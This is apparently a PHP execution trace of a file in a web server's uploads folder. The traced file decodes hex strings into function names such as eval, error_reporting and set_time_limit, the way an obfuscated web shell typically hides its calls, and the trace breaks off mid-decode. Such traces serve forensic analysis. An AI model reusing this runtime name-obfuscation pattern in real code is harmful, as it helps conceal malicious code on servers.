3	931	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	932	0	0.035613	721552	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'76'
3	932	1	0.035624	721600
3	932	R			118
3	933	0	0.035636	721520	chr	0		/var/www/html/uploads/1CTT.php	204	1	118
3	933	1	0.035648	721560
3	933	R			'v'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'v'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	934	0	0.035678	721552	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	934	1	0.035689	721600
3	934	R			97
3	935	0	0.035702	721520	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	935	1	0.035713	721560
3	935	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	936	0	0.035743	721552	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	936	1	0.035754	721600
3	936	R			108
3	937	0	0.035767	721520	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	937	1	0.035778	721560
3	937	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	929	1	0.035808	721520
2	929	R			'eval'
1		A						/var/www/html/uploads/1CTT.php	7	$func[47] = 'eval'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	938	0	0.035840	721520	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6f625f7374617274'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	939	0	0.035883	721552	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	939	1	0.035895	721600
3	939	R			111
3	940	0	0.035907	721520	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	940	1	0.035934	721560
3	940	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	941	0	0.035968	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	941	1	0.035980	721632
3	941	R			98
3	942	0	0.035992	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	942	1	0.036003	721592
3	942	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	943	0	0.036034	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	943	1	0.036045	721632
3	943	R			95
3	944	0	0.036057	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	944	1	0.036068	721592
3	944	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	945	0	0.036098	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	945	1	0.036109	721632
3	945	R			115
3	946	0	0.036121	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	946	1	0.036132	721592
3	946	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	947	0	0.036162	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	947	1	0.036173	721632
3	947	R			116
3	948	0	0.036185	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	948	1	0.036197	721592
3	948	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	949	0	0.036227	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	949	1	0.036238	721632
3	949	R			97
3	950	0	0.036250	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	950	1	0.036261	721592
3	950	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	951	0	0.036291	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	951	1	0.036302	721632
3	951	R			114
3	952	0	0.036314	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	952	1	0.036329	721592
3	952	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	953	0	0.036359	721584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	953	1	0.036369	721632
3	953	R			116
3	954	0	0.036382	721552	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	954	1	0.036394	721592
3	954	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	938	1	0.036424	721560
2	938	R			'ob_start'
1		A						/var/www/html/uploads/1CTT.php	7	$func[48] = 'ob_start'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	955	0	0.036458	721560	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66756e6374696f6e5f657869737473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 29
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	956	0	0.036499	721592	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	956	1	0.036511	721640
3	956	R			102
3	957	0	0.036524	721560	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	957	1	0.036535	721600
3	957	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	958	0	0.036566	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	958	1	0.036577	721672
3	958	R			117
3	959	0	0.036589	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	959	1	0.036600	721632
3	959	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	960	0	0.036630	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	960	1	0.036641	721672
3	960	R			110
3	961	0	0.036653	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	961	1	0.036665	721632
3	961	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	962	0	0.036695	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	962	1	0.036705	721672
3	962	R			99
3	963	0	0.036718	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	963	1	0.036729	721632
3	963	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	964	0	0.036758	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	964	1	0.036769	721672
3	964	R			116
3	965	0	0.036781	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	965	1	0.036793	721632
3	965	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	966	0	0.036822	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	966	1	0.036833	721672
3	966	R			105
3	967	0	0.036845	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	967	1	0.036856	721632
3	967	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	968	0	0.036886	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	968	1	0.036897	721672
3	968	R			111
3	969	0	0.036909	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	969	1	0.036920	721632
3	969	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	970	0	0.036950	721624	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	970	1	0.036961	721672
3	970	R			110
3	971	0	0.036973	721592	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	971	1	0.036984	721632
3	971	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	972	0	0.037014	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	972	1	0.037025	721680
3	972	R			95
3	973	0	0.037040	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	973	1	0.037051	721640
3	973	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	974	0	0.037081	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	974	1	0.037092	721680
3	974	R			101
3	975	0	0.037104	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	975	1	0.037115	721640
3	975	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	976	0	0.037144	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	976	1	0.037155	721680
3	976	R			120
3	977	0	0.037167	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	977	1	0.037178	721640
3	977	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	978	0	0.037208	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	978	1	0.037219	721680
3	978	R			105
3	979	0	0.037231	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	979	1	0.037243	721640
3	979	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	980	0	0.037272	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	980	1	0.037283	721680
3	980	R			115
3	981	0	0.037295	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	981	1	0.037307	721640
3	981	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	982	0	0.037336	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	982	1	0.037347	721680
3	982	R			116
3	983	0	0.037359	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	983	1	0.037370	721640
3	983	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	984	0	0.037400	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	984	1	0.037411	721680
3	984	R			115
3	985	0	0.037423	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	985	1	0.037434	721640
3	985	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	955	1	0.037464	721600
2	955	R			'function_exists'
1		A						/var/www/html/uploads/1CTT.php	7	$func[49] = 'function_exists'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	986	0	0.037499	721600	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6572726f725f7265706f7274696e67'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 29
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	987	0	0.037541	721632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	987	1	0.037553	721680
3	987	R			101
3	988	0	0.037566	721600	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	988	1	0.037577	721640
3	988	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	989	0	0.037608	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	989	1	0.037619	721712
3	989	R			114
3	990	0	0.037631	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	990	1	0.037642	721672
3	990	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	991	0	0.037672	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	991	1	0.037683	721712
3	991	R			114
3	992	0	0.037695	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	992	1	0.037707	721672
3	992	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	993	0	0.037736	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	993	1	0.037751	721712
3	993	R			111
3	994	0	0.037763	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	994	1	0.037775	721672
3	994	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	995	0	0.037805	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	995	1	0.037816	721712
3	995	R			114
3	996	0	0.037828	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	996	1	0.037839	721672
3	996	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	997	0	0.037868	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	997	1	0.037880	721712
3	997	R			95
3	998	0	0.037892	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	998	1	0.037902	721672
3	998	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	999	0	0.037932	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	999	1	0.037943	721712
3	999	R			114
3	1000	0	0.037955	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1000	1	0.037966	721672
3	1000	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1001	0	0.037995	721664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1001	1	0.038007	721712
3	1001	R			101
3	1002	0	0.038020	721632	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1002	1	0.038031	721672
3	1002	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1003	0	0.038061	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1003	1	0.038073	721720
3	1003	R			112
3	1004	0	0.038085	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1004	1	0.038096	721680
3	1004	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1005	0	0.038126	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1005	1	0.038138	721720
3	1005	R			111
3	1006	0	0.038151	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1006	1	0.038162	721680
3	1006	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1007	0	0.038192	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1007	1	0.038204	721720
3	1007	R			114
3	1008	0	0.038216	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1008	1	0.038227	721680
3	1008	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1009	0	0.038257	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1009	1	0.038269	721720
3	1009	R			116
3	1010	0	0.038281	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1010	1	0.038292	721680
3	1010	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1011	0	0.038322	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1011	1	0.038334	721720
3	1011	R			105
3	1012	0	0.038347	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1012	1	0.038357	721680
3	1012	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1013	0	0.038387	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1013	1	0.038399	721720
3	1013	R			110
3	1014	0	0.038411	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1014	1	0.038422	721680
3	1014	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1015	0	0.038452	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1015	1	0.038467	721720
3	1015	R			103
3	1016	0	0.038480	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1016	1	0.038491	721680
3	1016	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	986	1	0.038521	721640
2	986	R			'error_reporting'
1		A						/var/www/html/uploads/1CTT.php	7	$func[50] = 'error_reporting'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1017	0	0.038555	721640	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7365745f74696d655f6c696d6974'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 27
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1018	0	0.038597	721672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1018	1	0.038609	721720
3	1018	R			115
3	1019	0	0.038629	721640	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1019	1	0.038641	721680
3	1019	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1020	0	0.038672	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1020	1	0.038683	721752
3	1020	R			101
3	1021	0	0.038696	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1021	1	0.038706	721712
3	1021	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1022	0	0.038736	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1022	1	0.038749	721752
3	1022	R			116
3	1023	0	0.038761	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1023	1	0.038772	721712
3	1023	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1024	0	0.038802	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1024	1	0.038814	721752
3	1024	R			95
3	1025	0	0.038826	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1025	1	0.038838	721712
3	1025	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1026	0	0.038868	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1026	1	0.038879	721752
3	1026	R			116
3	1027	0	0.038891	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1027	1	0.038902	721712
3	1027	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1028	0	0.038932	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1028	1	0.038944	721752
3	1028	R			105
3	1029	0	0.038956	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1029	1	0.038967	721712
3	1029	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1030	0	0.038997	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1030	1	0.039009	721752
3	1030	R			109
3	1031	0	0.039021	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1031	1	0.039033	721712
3	1031	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1032	0	0.039063	721704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1032	1	0.039074	721752
3	1032	R			101
3	1033	0	0.039087	721672	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1033	1	0.039097	721712
3	1033	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1034	0	0.039127	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1034	1	0.039139	721760
3	1034	R			95
3	1035	0	0.039151	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1035	1	0.039163	721720
3	1035	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1036	0	0.039197	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1036	1	0.039209	721760
3	1036	R			108
3	1037	0	0.039221	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1037	1	0.039233	721720
3	1037	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1038	0	0.039262	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1038	1	0.039274	721760
3	1038	R			105
3	1039	0	0.039287	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1039	1	0.039298	721720
3	1039	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1040	0	0.039329	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1040	1	0.039340	721760
3	1040	R			109
3	1041	0	0.039353	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1041	1	0.039364	721720
3	1041	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1042	0	0.039393	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1042	1	0.039404	721760
3	1042	R			105
3	1043	0	0.039417	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1043	1	0.039428	721720
3	1043	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1044	0	0.039458	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1044	1	0.039469	721760
3	1044	R			116
3	1045	0	0.039482	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1045	1	0.039493	721720
3	1045	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1017	1	0.039523	721680
2	1017	R			'set_time_limit'
1		A						/var/www/html/uploads/1CTT.php	7	$func[51] = 'set_time_limit'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1046	0	0.039557	721680	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'636c656172737461746361636865'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 27
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1047	0	0.039600	721712	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1047	1	0.039612	721760
3	1047	R			99
3	1048	0	0.039624	721680	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1048	1	0.039635	721720
3	1048	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1049	0	0.039666	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1049	1	0.039678	721792
3	1049	R			108
3	1050	0	0.039691	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1050	1	0.039702	721752
3	1050	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1051	0	0.039732	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1051	1	0.039744	721792
3	1051	R			101
3	1052	0	0.039756	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1052	1	0.039767	721752
3	1052	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1053	0	0.039797	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1053	1	0.039809	721792
3	1053	R			97
3	1054	0	0.039821	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1054	1	0.039833	721752
3	1054	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1055	0	0.039863	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1055	1	0.039875	721792
3	1055	R			114
3	1056	0	0.039889	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1056	1	0.039904	721752
3	1056	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1057	0	0.039948	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1057	1	0.039961	721792
3	1057	R			115
3	1058	0	0.039973	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1058	1	0.039984	721752
3	1058	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1059	0	0.040014	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1059	1	0.040026	721792
3	1059	R			116
3	1060	0	0.040038	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1060	1	0.040050	721752
3	1060	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1061	0	0.040080	721744	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1061	1	0.040092	721792
3	1061	R			97
3	1062	0	0.040104	721712	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1062	1	0.040115	721752
3	1062	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1063	0	0.040144	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1063	1	0.040156	721800
3	1063	R			116
3	1064	0	0.040169	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1064	1	0.040180	721760
3	1064	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1065	0	0.040209	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1065	1	0.040221	721800
3	1065	R			99
3	1066	0	0.040233	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1066	1	0.040244	721760
3	1066	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1067	0	0.040274	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1067	1	0.040286	721800
3	1067	R			97
3	1068	0	0.040298	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1068	1	0.040310	721760
3	1068	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1069	0	0.040339	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1069	1	0.040351	721800
3	1069	R			99
3	1070	0	0.040363	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1070	1	0.040374	721760
3	1070	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1071	0	0.040404	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	1071	1	0.040415	721800
3	1071	R			104
3	1072	0	0.040428	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	1072	1	0.040439	721760
3	1072	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
